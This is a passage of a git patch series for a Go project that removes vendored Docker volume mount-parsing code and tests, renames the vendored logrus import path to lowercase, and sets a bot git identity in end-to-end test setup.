``, "", false, true}, - {`name:d::rw`, "local", `d:`, ``, `name`, "local", true, false}, - {`name:d:`, "local", `d:`, ``, `name`, "local", true, false}, - // TODO Windows post TP5 - Add readonly support {`name:d::ro`, "local", `d:`, ``, `name`, "local", false, false}, - {`name:c:`, "", ``, ``, ``, "", true, true}, - {`driver/name:c:`, "", ``, ``, ``, "", true, true}, - } - } else { - cases = []testParseMountRaw{ - {"/tmp:/tmp1", "", "/tmp1", "/tmp", "", "", true, false}, - {"/tmp:/tmp2:ro", "", "/tmp2", "/tmp", "", "", false, false}, - {"/tmp:/tmp3:rw", "", "/tmp3", "/tmp", "", "", true, false}, - {"/tmp:/tmp4:foo", "", "", "", "", "", false, true}, - {"name:/named1", "", "/named1", "", "name", "", true, false}, - {"name:/named2", "external", "/named2", "", "name", "external", true, false}, - {"name:/named3:ro", "local", "/named3", "", "name", "local", false, false}, - {"local/name:/tmp:rw", "", "/tmp", "", "local/name", "", true, false}, - {"/tmp:tmp", "", "", "", "", "", true, true}, - } - } - - for i, c := range cases { - t.Logf("case %d", i) - m, err := ParseMountRaw(c.bind, c.driver) - if c.fail { - if err == nil { - t.Fatalf("Expected error, was nil, for spec %s\n", c.bind) - } - continue - } - - if m == nil || err != nil { - t.Fatalf("ParseMountRaw failed for spec '%s', driver '%s', error '%v'", c.bind, c.driver, err.Error()) - continue - } - - if m.Destination != c.expDest { - t.Fatalf("Expected destination '%s, was %s', for spec '%s'", c.expDest, m.Destination, c.bind) - } - - if m.Source != c.expSource { - t.Fatalf("Expected source '%s', was '%s', for spec '%s'", c.expSource, m.Source, c.bind) - } - - if m.Name != c.expName { - t.Fatalf("Expected name '%s', was '%s' for spec '%s'", c.expName, m.Name, c.bind) - } - - if m.Driver != c.expDriver { - t.Fatalf("Expected driver '%s', was '%s', for spec '%s'", c.expDriver, m.Driver, c.bind) - } - - if m.RW != c.expRW { - t.Fatalf("Expected RW '%v', was '%v' for spec '%s'", c.expRW, m.RW, c.bind) - } - } -} - -func TestParseMountSpec(t *testing.T) { - type c struct { - input mount.Mount - expected MountPoint - } - testDir, err := ioutil.TempDir("", "test-mount-config") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(testDir) - - cases := []c{ - {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, - {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, RW: true}}, - {mount.Mount{Type: mount.TypeBind, Source: testDir + string(os.PathSeparator), Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, - {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath + string(os.PathSeparator), ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}}, - {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: DefaultCopyMode}}, - {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath + string(os.PathSeparator)}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: DefaultCopyMode}}, - } - - for i, c := range cases { - t.Logf("case %d", i) - mp, err := ParseMountSpec(c.input) - if err != nil { - t.Fatal(err) - } - - if c.expected.Type != mp.Type { - t.Fatalf("Expected mount types to match. Expected: '%s', Actual: '%s'", c.expected.Type, mp.Type) - } - if c.expected.Destination != mp.Destination { - t.Fatalf("Expected mount destination to match. Expected: '%s', Actual: '%s'", c.expected.Destination, mp.Destination) - } - if c.expected.Source != mp.Source { - t.Fatalf("Expected mount source to match. Expected: '%s', Actual: '%s'", c.expected.Source, mp.Source) - } - if c.expected.RW != mp.RW { - t.Fatalf("Expected mount writable to match. Expected: '%v', Actual: '%v'", c.expected.RW, mp.RW) - } - if c.expected.Propagation != mp.Propagation { - t.Fatalf("Expected mount propagation to match. Expected: '%v', Actual: '%s'", c.expected.Propagation, mp.Propagation) - } - if c.expected.Driver != mp.Driver { - t.Fatalf("Expected mount driver to match. Expected: '%v', Actual: '%s'", c.expected.Driver, mp.Driver) - } - if c.expected.CopyData != mp.CopyData { - t.Fatalf("Expected mount copy data to match. Expected: '%v', Actual: '%v'", c.expected.CopyData, mp.CopyData) - } - } -} diff --git a/vendor/github.com/docker/docker/volume/volume_unix.go b/vendor/github.com/docker/docker/volume/volume_unix.go deleted file mode 100644 index 0256ebb2ba..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_unix.go +++ /dev/null @@ -1,138 +0,0 @@ -// +build linux freebsd darwin solaris - -package volume - -import ( - "fmt" - "os" - "path/filepath" - "strings" - - mounttypes "github.com/docker/docker/api/types/mount" -) - -var platformRawValidationOpts = []func(o *validateOpts){ - // need to make sure to not error out if the bind source does not exist on unix - // this is supported for historical reasons, the path will be automatically - // created later. - func(o *validateOpts) { o.skipBindSourceCheck = true }, -} - -// read-write modes -var rwModes = map[string]bool{ - "rw": true, - "ro": true, -} - -// label modes -var labelModes = map[string]bool{ - "Z": true, - "z": true, -} - -// BackwardsCompatible decides whether this mount point can be -// used in old versions of Docker or not. -// Only bind mounts and local volumes can be used in old versions of Docker. -func (m *MountPoint) BackwardsCompatible() bool { - return len(m.Source) > 0 || m.Driver == DefaultDriverName -} - -// HasResource checks whether the given absolute path for a container is in -// this mount point. If the relative path starts with `../` then the resource -// is outside of this mount point, but we can't simply check for this prefix -// because it misses `..` which is also outside of the mount, so check both. -func (m *MountPoint) HasResource(absolutePath string) bool { - relPath, err := filepath.Rel(m.Destination, absolutePath) - return err == nil && relPath != ".." && !strings.HasPrefix(relPath, fmt.Sprintf("..%c", filepath.Separator)) -} - -// IsVolumeNameValid checks a volume name in a platform specific manner. -func IsVolumeNameValid(name string) (bool, error) { - return true, nil -} - -// ValidMountMode will make sure the mount mode is valid. -// returns if it's a valid mount mode or not. -func ValidMountMode(mode string) bool { - if mode == "" { - return true - } - - rwModeCount := 0 - labelModeCount := 0 - propagationModeCount := 0 - copyModeCount := 0 - - for _, o := range strings.Split(mode, ",") { - switch { - case rwModes[o]: - rwModeCount++ - case labelModes[o]: - labelModeCount++ - case propagationModes[mounttypes.Propagation(o)]: - propagationModeCount++ - case copyModeExists(o): - copyModeCount++ - default: - return false - } - } - - // Only one string for each mode is allowed. - if rwModeCount > 1 || labelModeCount > 1 || propagationModeCount > 1 || copyModeCount > 1 { - return false - } - return true -} - -// ReadWrite tells you if a mode string is a valid read-write mode or not. -// If there are no specifications w.r.t read write mode, then by default -// it returns true. -func ReadWrite(mode string) bool { - if !ValidMountMode(mode) { - return false - } - - for _, o := range strings.Split(mode, ",") { - if o == "ro" { - return false - } - } - return true -} - -func validateNotRoot(p string) error { - p = filepath.Clean(convertSlash(p)) - if p == "/" { - return fmt.Errorf("invalid specification: destination can't be '/'") - } - return nil -} - -func validateCopyMode(mode bool) error { - return nil -} - -func convertSlash(p string) string { - return filepath.ToSlash(p) -} - -func splitRawSpec(raw string) ([]string, error) { - if strings.Count(raw, ":") > 2 { - return nil, errInvalidSpec(raw) - } - - arr := strings.SplitN(raw, ":", 3) - if arr[0] == "" { - return nil, errInvalidSpec(raw) - } - return arr, nil -} - -func clean(p string) string { - return filepath.Clean(p) -} - -func validateStat(fi os.FileInfo) error { - return nil -} diff --git a/vendor/github.com/docker/docker/volume/volume_unsupported.go b/vendor/github.com/docker/docker/volume/volume_unsupported.go deleted file mode 100644 index ff9d6afa27..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_unsupported.go +++ /dev/null @@ -1,16 +0,0 @@ -// +build !linux - -package volume - -import ( - "fmt" - "runtime" - - mounttypes "github.com/docker/docker/api/types/mount" -) - -// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string -// for mount(2). -func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) { - return "", fmt.Errorf("%s does not support tmpfs", runtime.GOOS) -} diff --git a/vendor/github.com/docker/docker/volume/volume_windows.go b/vendor/github.com/docker/docker/volume/volume_windows.go deleted file mode 100644 index 22f6fc7a14..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_windows.go +++ /dev/null @@ -1,201 +0,0 @@ -package volume - -import ( - "fmt" - "os" - "path/filepath" - "regexp" - "strings" -) - -// read-write modes -var rwModes = map[string]bool{ - "rw": true, -} - -// read-only modes -var roModes = map[string]bool{ - "ro": true, -} - -var platformRawValidationOpts = []func(*validateOpts){ - // filepath.IsAbs is weird on Windows: - // `c:` is not considered an absolute path - // `c:\` is considered an absolute path - // In any case, the regex matching below ensures absolute paths - // TODO: consider this a bug with filepath.IsAbs (?) - func(o *validateOpts) { o.skipAbsolutePathCheck = true }, -} - -const ( - // Spec should be in the format [source:]destination[:mode] - // - // Examples: c:\foo bar:d:rw - // c:\foo:d:\bar - // myname:d: - // d:\ - // - // Explanation of this regex! Thanks @thaJeztah on IRC and gist for help. See - // https://gist.github.com/thaJeztah/6185659e4978789fb2b2. A good place to - // test is https://regex-golang.appspot.com/assets/html/index.html - // - // Useful link for referencing named capturing groups: - // http://stackoverflow.com/questions/20750843/using-named-matches-from-go-regex - // - // There are three match groups: source, destination and mode. - // - - // RXHostDir is the first option of a source - RXHostDir = `[a-z]:\\(?:[^\\/:*?"<>|\r\n]+\\?)*` - // RXName is the second option of a source - RXName = `[^\\/:*?"<>|\r\n]+` - // RXReservedNames are reserved names not possible on Windows - RXReservedNames = `(con)|(prn)|(nul)|(aux)|(com[1-9])|(lpt[1-9])` - - // RXSource is the combined possibilities for a source - RXSource = `((?P((` + RXHostDir + `)|(` + RXName + `))):)?` - - // Source. Can be either a host directory, a name, or omitted: - // HostDir: - // - Essentially using the folder solution from - // https://www.safaribooksonline.com/library/view/regular-expressions-cookbook/9781449327453/ch08s18.html - // but adding case insensitivity. - // - Must be an absolute path such as c:\path - // - Can include spaces such as `c:\program files` - // - And then followed by a colon which is not in the capture group - // - And can be optional - // Name: - // - Must not contain invalid NTFS filename characters (https://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx) - // - And then followed by a colon which is not in the capture group - // - And can be optional - - // RXDestination is the regex expression for the mount destination - RXDestination = `(?P([a-z]):((?:\\[^\\/:*?"<>\r\n]+)*\\?))` - // Destination (aka container path): - // - Variation on hostdir but can be a drive followed by colon as well - // - If a path, must be absolute. Can include spaces - // - Drive cannot be c: (explicitly checked in code, not RegEx) - - // RXMode is the regex expression for the mode of the mount - // Mode (optional): - // - Hopefully self explanatory in comparison to above regex's. - // - Colon is not in the capture group - RXMode = `(:(?P(?i)ro|rw))?` -) - -// BackwardsCompatible decides whether this mount point can be -// used in old versions of Docker or not. -// Windows volumes are never backwards compatible. -func (m *MountPoint) BackwardsCompatible() bool { - return false -} - -func splitRawSpec(raw string) ([]string, error) { - specExp := regexp.MustCompile(`^` + RXSource + RXDestination + RXMode + `$`) - match := specExp.FindStringSubmatch(strings.ToLower(raw)) - - // Must have something back - if len(match) == 0 { - return nil, errInvalidSpec(raw) - } - - var split []string - matchgroups := make(map[string]string) - // Pull out the sub expressions from the named capture groups - for i, name := range specExp.SubexpNames() { - matchgroups[name] = strings.ToLower(match[i]) - } - if source, exists := matchgroups["source"]; exists { - if source != "" { - split = append(split, source) - } - } - if destination, exists := matchgroups["destination"]; exists { - if destination != "" { - split = append(split, destination) - } - } - if mode, exists := matchgroups["mode"]; exists { - if mode != "" { - split = append(split, mode) - } - } - // Fix #26329. If the destination appears to be a file, and the source is null, - // it may be because we've fallen through the possible naming regex and hit a - // situation where the user intention was to map a file into a container through - // a local volume, but this is not supported by the platform. - if matchgroups["source"] == "" && matchgroups["destination"] != "" { - validName, err := IsVolumeNameValid(matchgroups["destination"]) - if err != nil { - return nil, err - } - if !validName { - if fi, err := os.Stat(matchgroups["destination"]); err == nil { - if !fi.IsDir() { - return nil, fmt.Errorf("file '%s' cannot be mapped. Only directories can be mapped on this platform", matchgroups["destination"]) - } - } - } - } - return split, nil -} - -// IsVolumeNameValid checks a volume name in a platform specific manner. -func IsVolumeNameValid(name string) (bool, error) { - nameExp := regexp.MustCompile(`^` + RXName + `$`) - if !nameExp.MatchString(name) { - return false, nil - } - nameExp = regexp.MustCompile(`^` + RXReservedNames + `$`) - if nameExp.MatchString(name) { - return false, fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", name) - } - return true, nil -} - -// ValidMountMode will make sure the mount mode is valid. -// returns if it's a valid mount mode or not. -func ValidMountMode(mode string) bool { - if mode == "" { - return true - } - return roModes[strings.ToLower(mode)] || rwModes[strings.ToLower(mode)] -} - -// ReadWrite tells you if a mode string is a valid read-write mode or not. -func ReadWrite(mode string) bool { - return rwModes[strings.ToLower(mode)] || mode == "" -} - -func validateNotRoot(p string) error { - p = strings.ToLower(convertSlash(p)) - if p == "c:" || p == `c:\` { - return fmt.Errorf("destination path cannot be `c:` or `c:\\`: %v", p) - } - return nil -} - -func validateCopyMode(mode bool) error { - if mode { - return fmt.Errorf("Windows does not support copying image path content") - } - return nil -} - -func convertSlash(p string) string { - return filepath.FromSlash(p) -} - -func clean(p string) string { - if match, _ := regexp.MatchString("^[a-z]:$", p); match { - return p - } - return filepath.Clean(p) -} - -func validateStat(fi os.FileInfo) error { - if !fi.IsDir() { - return fmt.Errorf("source path must be a directory") - } - return nil -} From 182471742cffd4988aaa8dab8172ea81c1ee12cf Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 11:49:59 +0100 Subject: [PATCH 34/69] Use correct case for sirupsen. --- vendor/github.com/{Sirupsen => sirupsen}/logrus/.gitignore | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/.travis.yml | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/CHANGELOG.md | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/LICENSE | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/README.md | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/appveyor.yml | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/doc.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/entry.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/entry_test.go | 0 .../{Sirupsen => sirupsen}/logrus/example_basic_test.go | 0 .../github.com/{Sirupsen => sirupsen}/logrus/example_hook_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/exported.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/formatter.go | 0 .../{Sirupsen => sirupsen}/logrus/formatter_bench_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/hook_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks.go | 0 .../{Sirupsen => sirupsen}/logrus/hooks/syslog/README.md | 0 .../{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog.go | 0 .../{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog_test.go | 0 .../github.com/{Sirupsen => sirupsen}/logrus/hooks/test/test.go | 0 .../{Sirupsen => sirupsen}/logrus/hooks/test/test_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/json_formatter.go | 0 .../{Sirupsen => sirupsen}/logrus/json_formatter_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/logger.go | 0 .../github.com/{Sirupsen => sirupsen}/logrus/logger_bench_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_bsd.go | 0 .../{Sirupsen => sirupsen}/logrus/terminal_check_appengine.go | 0 .../{Sirupsen => sirupsen}/logrus/terminal_check_notappengine.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_linux.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/text_formatter.go | 0 .../{Sirupsen => sirupsen}/logrus/text_formatter_test.go | 0 vendor/github.com/{Sirupsen => sirupsen}/logrus/writer.go | 0 36 files changed, 0 insertions(+), 0 deletions(-) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/.gitignore (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/.travis.yml (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/CHANGELOG.md (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/LICENSE (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/README.md (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/alt_exit_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/appveyor.yml (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/doc.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/entry.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/entry_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/example_basic_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/example_hook_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/exported.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/formatter.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/formatter_bench_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hook_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/syslog/README.md (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/syslog/syslog_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/test/test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/hooks/test/test_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/json_formatter.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/json_formatter_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logger.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logger_bench_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/logrus_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_bsd.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_check_appengine.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_check_notappengine.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/terminal_linux.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/text_formatter.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/text_formatter_test.go (100%) rename vendor/github.com/{Sirupsen => sirupsen}/logrus/writer.go (100%) diff --git a/vendor/github.com/Sirupsen/logrus/.gitignore b/vendor/github.com/sirupsen/logrus/.gitignore similarity index 100% rename from vendor/github.com/Sirupsen/logrus/.gitignore rename to vendor/github.com/sirupsen/logrus/.gitignore diff --git a/vendor/github.com/Sirupsen/logrus/.travis.yml b/vendor/github.com/sirupsen/logrus/.travis.yml similarity index 100% rename from vendor/github.com/Sirupsen/logrus/.travis.yml rename to vendor/github.com/sirupsen/logrus/.travis.yml diff --git a/vendor/github.com/Sirupsen/logrus/CHANGELOG.md b/vendor/github.com/sirupsen/logrus/CHANGELOG.md similarity index 100% rename from vendor/github.com/Sirupsen/logrus/CHANGELOG.md rename to vendor/github.com/sirupsen/logrus/CHANGELOG.md diff --git a/vendor/github.com/Sirupsen/logrus/LICENSE b/vendor/github.com/sirupsen/logrus/LICENSE similarity index 100% rename from vendor/github.com/Sirupsen/logrus/LICENSE rename to vendor/github.com/sirupsen/logrus/LICENSE diff --git a/vendor/github.com/Sirupsen/logrus/README.md b/vendor/github.com/sirupsen/logrus/README.md similarity index 100% rename from vendor/github.com/Sirupsen/logrus/README.md rename to vendor/github.com/sirupsen/logrus/README.md diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit.go b/vendor/github.com/sirupsen/logrus/alt_exit.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/alt_exit.go rename to vendor/github.com/sirupsen/logrus/alt_exit.go diff --git a/vendor/github.com/Sirupsen/logrus/alt_exit_test.go b/vendor/github.com/sirupsen/logrus/alt_exit_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/alt_exit_test.go rename to vendor/github.com/sirupsen/logrus/alt_exit_test.go diff --git a/vendor/github.com/Sirupsen/logrus/appveyor.yml b/vendor/github.com/sirupsen/logrus/appveyor.yml similarity index 100% rename from vendor/github.com/Sirupsen/logrus/appveyor.yml rename to vendor/github.com/sirupsen/logrus/appveyor.yml diff --git a/vendor/github.com/Sirupsen/logrus/doc.go b/vendor/github.com/sirupsen/logrus/doc.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/doc.go rename to vendor/github.com/sirupsen/logrus/doc.go diff --git a/vendor/github.com/Sirupsen/logrus/entry.go b/vendor/github.com/sirupsen/logrus/entry.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/entry.go rename to vendor/github.com/sirupsen/logrus/entry.go diff --git a/vendor/github.com/Sirupsen/logrus/entry_test.go b/vendor/github.com/sirupsen/logrus/entry_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/entry_test.go rename to vendor/github.com/sirupsen/logrus/entry_test.go diff --git a/vendor/github.com/Sirupsen/logrus/example_basic_test.go b/vendor/github.com/sirupsen/logrus/example_basic_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/example_basic_test.go rename to vendor/github.com/sirupsen/logrus/example_basic_test.go diff --git a/vendor/github.com/Sirupsen/logrus/example_hook_test.go b/vendor/github.com/sirupsen/logrus/example_hook_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/example_hook_test.go rename to vendor/github.com/sirupsen/logrus/example_hook_test.go diff --git a/vendor/github.com/Sirupsen/logrus/exported.go b/vendor/github.com/sirupsen/logrus/exported.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/exported.go rename to vendor/github.com/sirupsen/logrus/exported.go diff --git a/vendor/github.com/Sirupsen/logrus/formatter.go b/vendor/github.com/sirupsen/logrus/formatter.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/formatter.go rename to vendor/github.com/sirupsen/logrus/formatter.go diff --git a/vendor/github.com/Sirupsen/logrus/formatter_bench_test.go b/vendor/github.com/sirupsen/logrus/formatter_bench_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/formatter_bench_test.go rename to vendor/github.com/sirupsen/logrus/formatter_bench_test.go diff --git a/vendor/github.com/Sirupsen/logrus/hook_test.go b/vendor/github.com/sirupsen/logrus/hook_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hook_test.go rename to vendor/github.com/sirupsen/logrus/hook_test.go diff --git a/vendor/github.com/Sirupsen/logrus/hooks.go b/vendor/github.com/sirupsen/logrus/hooks.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks.go rename to vendor/github.com/sirupsen/logrus/hooks.go diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md b/vendor/github.com/sirupsen/logrus/hooks/syslog/README.md similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks/syslog/README.md rename to vendor/github.com/sirupsen/logrus/hooks/syslog/README.md diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go b/vendor/github.com/sirupsen/logrus/hooks/syslog/syslog.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog.go rename to vendor/github.com/sirupsen/logrus/hooks/syslog/syslog.go diff --git a/vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go b/vendor/github.com/sirupsen/logrus/hooks/syslog/syslog_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks/syslog/syslog_test.go rename to vendor/github.com/sirupsen/logrus/hooks/syslog/syslog_test.go diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test.go b/vendor/github.com/sirupsen/logrus/hooks/test/test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks/test/test.go rename to vendor/github.com/sirupsen/logrus/hooks/test/test.go diff --git a/vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go b/vendor/github.com/sirupsen/logrus/hooks/test/test_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/hooks/test/test_test.go rename to vendor/github.com/sirupsen/logrus/hooks/test/test_test.go diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter.go b/vendor/github.com/sirupsen/logrus/json_formatter.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/json_formatter.go rename to vendor/github.com/sirupsen/logrus/json_formatter.go diff --git a/vendor/github.com/Sirupsen/logrus/json_formatter_test.go b/vendor/github.com/sirupsen/logrus/json_formatter_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/json_formatter_test.go rename to vendor/github.com/sirupsen/logrus/json_formatter_test.go diff --git a/vendor/github.com/Sirupsen/logrus/logger.go b/vendor/github.com/sirupsen/logrus/logger.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/logger.go rename to vendor/github.com/sirupsen/logrus/logger.go diff --git a/vendor/github.com/Sirupsen/logrus/logger_bench_test.go b/vendor/github.com/sirupsen/logrus/logger_bench_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/logger_bench_test.go rename to vendor/github.com/sirupsen/logrus/logger_bench_test.go diff --git a/vendor/github.com/Sirupsen/logrus/logrus.go b/vendor/github.com/sirupsen/logrus/logrus.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/logrus.go rename to vendor/github.com/sirupsen/logrus/logrus.go diff --git a/vendor/github.com/Sirupsen/logrus/logrus_test.go b/vendor/github.com/sirupsen/logrus/logrus_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/logrus_test.go rename to vendor/github.com/sirupsen/logrus/logrus_test.go diff --git a/vendor/github.com/Sirupsen/logrus/terminal_bsd.go b/vendor/github.com/sirupsen/logrus/terminal_bsd.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/terminal_bsd.go rename to vendor/github.com/sirupsen/logrus/terminal_bsd.go diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go b/vendor/github.com/sirupsen/logrus/terminal_check_appengine.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go rename to vendor/github.com/sirupsen/logrus/terminal_check_appengine.go diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go b/vendor/github.com/sirupsen/logrus/terminal_check_notappengine.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go rename to vendor/github.com/sirupsen/logrus/terminal_check_notappengine.go diff --git a/vendor/github.com/Sirupsen/logrus/terminal_linux.go b/vendor/github.com/sirupsen/logrus/terminal_linux.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/terminal_linux.go rename to vendor/github.com/sirupsen/logrus/terminal_linux.go diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter.go b/vendor/github.com/sirupsen/logrus/text_formatter.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/text_formatter.go rename to vendor/github.com/sirupsen/logrus/text_formatter.go diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter_test.go b/vendor/github.com/sirupsen/logrus/text_formatter_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/text_formatter_test.go rename to vendor/github.com/sirupsen/logrus/text_formatter_test.go diff --git a/vendor/github.com/Sirupsen/logrus/writer.go b/vendor/github.com/sirupsen/logrus/writer.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/writer.go rename to vendor/github.com/sirupsen/logrus/writer.go From c6b18e383996a90e33c02776f187c59b65be2aae Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 11:58:10 +0100 Subject: [PATCH 35/69] Fix tests --- server/events_controller_e2e_test.go | 2 ++ 1 file changed, 2 insertions(+) diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 3853d1349b..6044b0163f 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -404,6 +404,8 @@ func initializeRepo(t *testing.T, repoDir string) (string, string, func()) { runCmd(t, destDir, "git", "init") runCmd(t, destDir, "touch", ".gitkeep") runCmd(t, destDir, "git", "add", ".gitkeep") + runCmd(t, destDir, "git", "config", "--local", "user.email", "atlantisbot@runatlantis.io") + runCmd(t, destDir, "git", "config", "--local", "user.name", "atlantisbot") runCmd(t, destDir, "git", "commit", "-m", "initial commit") runCmd(t, destDir, "git", "checkout", "-b", "branch") runCmd(t, destDir, "git", "add", ".") From 856c0d0c728abfadb801e6e88d24b2aa209fbdab Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 12:19:16 +0100 Subject: [PATCH 36/69] Use atlantisbot --- e2e/.gitconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/e2e/.gitconfig b/e2e/.gitconfig index 43da800f32..3424a0e076 100644 --- a/e2e/.gitconfig +++ b/e2e/.gitconfig @@ -1,3 +1,3 @@ [user] - name = Luke Kysow + name = atlantisbot email = lkysow+atlantis@gmail.com \ No newline at 